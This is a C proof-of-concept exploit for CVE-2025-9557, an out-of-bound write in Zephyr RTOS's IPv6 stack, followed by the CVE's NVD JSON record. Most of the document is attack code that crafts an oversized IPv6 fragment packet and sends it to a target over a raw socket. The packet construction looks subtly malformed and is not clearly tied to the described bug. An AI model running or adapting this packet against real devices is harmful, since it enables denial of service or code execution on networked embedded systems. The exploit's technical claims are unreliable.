CVE-2025-9557

// CVE-2025-9557 PoC - IPv6 Packet Triggering Out-of-Bound Write in Zephyr RTOS // This PoC demonstrates the vulnerability in Zephyr's IPv6 packet handling #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/ip6.h> // Craft malicious IPv6 packet with oversized extension header unsigned char* craft_malicious_ipv6_packet() { unsigned char *packet = (unsigned char*)malloc(1024); struct ip6_hdr *ip6 = (struct ip6_hdr*)packet; // IPv6 header ip6->ip6_vfc = 0x60; // Version 6 ip6->ip6_plen = htons(512); // Large payload to trigger overflow ip6->ip6_nxt = 0x29; // IPv6-Frag header ip6->ip6_hlim = 64; // Source and destination addresses inet_pton(AF_INET6, "2001:db8::1", &ip6->ip6_src); inet_pton(AF_INET6, "2001:db8::2", &ip6->ip6_dst); // Malicious fragment header with oversized fragment unsigned char *frag = packet + sizeof(struct ip6_hdr); frag[0] = 0x11; // Next header frag[1] = 0x00; // Fragment offset = 0, M flag = 0 frag[2] = 0x00; // Identification[0-7] frag[3] = 0x00; // Identification[8-15] frag[4] = 0x00; // Identification[16-23] frag[5] = 0x01; // Identification[24-31] // Fill with pattern to trigger out-of-bound write memset(packet + sizeof(struct ip6_hdr) + 6, 0x41, 512); return packet; } int main() { int sock; struct sockaddr_in6 dst; unsigned char *packet; printf("[*] CVE-2025-9557 PoC - Zephyr RTOS IPv6 OOB Write\n"); printf("[*] Target: Zephyr RTOS devices with vulnerable IPv6 stack\n"); // Create raw socket for sending IPv6 packets sock = socket(AF_INET6, SOCK_RAW, IPPROTO_RAW); if (sock < 0) { perror("[!] Socket creation failed"); return 1; } packet = craft_malicious_ipv6_packet(); memset(&dst, 0, sizeof(dst)); dst.sin6_family = AF_INET6; inet_pton(AF_INET6, "2001:db8::2", &dst.sin6_addr); dst.sin6_port = htons(0); printf("[*] Sending malicious IPv6 packet...\n"); // Send the crafted packet if (sendto(sock, packet, 1024, 0, (struct sockaddr*)&dst, sizeof(dst)) < 0) { perror("[!] Send failed"); } else { printf("[+] Packet sent successfully\n"); printf("[*] If target is vulnerable, this may trigger OOB write\n"); } close(sock); free(packet); return 0; }

{"cve": {"id": "CVE-2025-9557", "sourceIdentifier": "[email protected]", "published": "2025-11-26T06:15:46.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "‭An out-of-bound write can lead to an arbitrary code execution. Even on devices with some form of memory protection, this can still lead to‬ ‭a crash and a resultant denial of service.‬"}, {"lang": "es", "value": "Una escritura fuera de límites puede provocar la ejecución de código arbitrario. Incluso en dispositivos con algún tipo de protección de memoria, esto puede provocar un bloqueo y la consiguiente denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", "baseScore": 7.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-r3j3-c5v7-2ppf", "source": "[email protected]"}]}}